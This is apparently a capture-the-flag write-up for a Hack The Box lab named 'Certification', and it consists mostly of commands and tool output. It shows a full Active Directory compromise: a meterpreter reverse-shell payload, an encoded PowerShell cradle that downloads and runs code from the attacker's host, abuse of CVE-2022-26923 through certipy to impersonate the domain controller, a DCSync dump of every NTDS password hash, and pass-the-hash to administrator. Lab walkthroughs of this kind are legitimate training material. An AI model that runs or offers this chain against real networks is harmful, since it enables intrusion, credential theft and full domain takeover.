Certification
A Certification Authority has declined our requests to access their data in order to identify a well known APT group. Unfortunately we do not have the jurisdiction to force them to cooperate. For this reason you are tasked with hacking their infrastructure in order to gather information.
Enumeration:
sudo nmap -sS -sV -Pn -p- -T4 -n --open -A -oA certification-full-sweep 10.129.230.126
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-15 16:09:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
8000/tcp open http-alt
|_http-open-proxy: Proxy might be redirecting requests
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57496/tcp open msrpc Microsoft Windows RPC
59262/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64924/tcp open msrpc Microsoft Windows RPC
/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.230.126
SMB 10.129.230.126 445 CFN-SVRDC01 [*] Windows 10.0 Build 20348 x64 (name:CFN-SVRDC01) (domain:certification.htb) (signing:True) (SMBv1:False)
Visit http://10.129.230.126:8000/ and login with admin:admin. http://10.129.230.126:8000/settings/global allows you to define commands that are triggered through different events, e.g., Before Rename.
Preparation:
msfvenom -p windows/x64/meterpreter/reverse_https lhost=tun0 lport=443 exitfunc=thread -f ps1
nano Public/bp-simple-runim64.ps1
echo -n "iex (New-Object System.Net.WebClient).DownloadString('http://10.10.14.43/bp-simple-runim64.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
powershell.exe -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMALwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA
cd Public/
sudo python3 -m http.server 80
Now trigger command execution by, for example, renaming a folder (http://10.129.230.126:8000/files/) and receive Meterpreter session.
meterpreter > cat user.txt
HTB{Abu51ng_F34tur3s_4r3_fun}
Nice. Discover user credentials:
meterpreter > cat applist.ps1
$user = "daniel.morgan"
$pass = "FDOnolk(naws)"
Challenge hints to ADCS. A recent vulnerability is presented here:
Enumeration:
certipy find 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb'
...
Template Name : Machine
Certificate Authorities : certification-CFN-SVRDC01-CA
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDnsAsCn
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Application Policies :
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFICATION.HTB\Domain Admins
CERTIFICATION.HTB\Domain Computers
CERTIFICATION.HTB\Enterprise Admins
...
Looks good! Exploitation:
sudo nano /etc/hosts
10.129.224.146 CFN-SVRDC01 certification.htb CFN-SVRDC01.certification.htb
(IP address has changed due to reboots)
Create a new machine account wtf$ and use the flag -dns to abuse CVE-2022–26923.
certipy account create 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb' -user wtf -dns 'CFN-SVRDC01.certification.htb'
Certipy v3.0.0 - by Oliver Lyak (ly4k)
Password:
[*] Creating new account:
sAMAccountName : wtf$
unicodePwd : J6AeabTzuSGNFElP
userAccountControl : 4096
servicePrincipalName : HOST/wtf
RestrictedKrbHost/wtf
dnsHostName : CFN-SVRDC01.certification.htb
[*] Successfully created account 'wtf$' with password 'J6AeabTzuSGNFElP'
Now request certificate. Only difference to blog post is the flag -dynamic-endpoint (did not work without it).
certipy req 'certification.htb/wtf$:J6AeabTzuSGNFElP@CFN-SVRDC01.certification.htb' -ca certification-CFN-SVRDC01-CA -template Machine -debug -dynamic-endpoint
Certipy v3.0.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CFN-SVRDC01.certification.htb' at '10.211.55.1'
[+] Generating RSA key
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.224.146[65389]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with DNS Host Name 'CFN-SVRDC01.certification.htb'
[*] Certificate object SID is None
[*] Saved certificate and private key to 'cfn-svrdc01.pfx'
Use certificate to retrieve NT hash for domain controller:
certipy auth -pfx cfn-svrdc01.pfx -dc-ip 10.129.224.146
Certipy v3.0.0 - by Oliver Lyak (ly4k)
[*] Using principal: cfn-svrdc01$@certification.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'cfn-svrdc01.ccache'
[*] Trying to retrieve NT hash for 'cfn-svrdc01$'
[*] Got NT hash for 'cfn-svrdc01$@certification.htb': d85512d5e138a972140986b9cc664d7a
DCSync:
/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.224.146 -u cfn-svrdc01$ -H d85512d5e138a972140986b9cc664d7a --ntds
SMB 10.129.224.146 445 CFN-SVRDC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.224.146 445 CFN-SVRDC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:30d9a71719214d675de29308730c0cb0:::
SMB 10.129.224.146 445 CFN-SVRDC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.224.146 445 CFN-SVRDC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60f1596c192904336a13ffbec1e4a682:::
SMB 10.129.224.146 445 CFN-SVRDC01 daniel.morgan\daniel.morgan:1104:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\timothy.newton:2101:aad3b435b51404eeaad3b435b51404ee:403e1f280556b28a91c684240102a0e3:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\ruth.williams:2102:aad3b435b51404eeaad3b435b51404ee:c510b26a2f8edfd216f613b1f5eb6e3c:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\nancy.spear:2103:aad3b435b51404eeaad3b435b51404ee:766a0f8cd98d4be3b63782e6428a1b25:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\robert.patterson:2104:aad3b435b51404eeaad3b435b51404ee:a485150cca1fee22c71fea688188ae1f:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\nathan.spear:2105:aad3b435b51404eeaad3b435b51404ee:f957fcf75f284a8bb3f685cd0a34ac9f:::
SMB 10.129.224.146 445 CFN-SVRDC01 CFN-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d85512d5e138a972140986b9cc664d7a:::
SMB 10.129.224.146 445 CFN-SVRDC01 CFN-WKS001$:1103:aad3b435b51404eeaad3b435b51404ee:8a040366cbb7be0816ec65c58ae97bac:::
SMB 10.129.224.146 445 CFN-SVRDC01 SETUPMACHINE$:3601:aad3b435b51404eeaad3b435b51404ee:e55b6e781f9bdc4199dcc7581b7f680c:::
SMB 10.129.224.146 445 CFN-SVRDC01 wtf$:7601:aad3b435b51404eeaad3b435b51404ee:c92817881ec894b7b6a538bf7cb4dbbb:::
Collect flag:
impacket-smbclient -hashes :30d9a71719214d675de29308730c0cb0 administrator@CFN-SVRDC01.certification.htb
# use C$
# cd Users
# cd Administrator
# cd Desktop
# cat root.txt
HTB{c3rtif1c4t35_c4n_8e_f4k3d}
Excellent.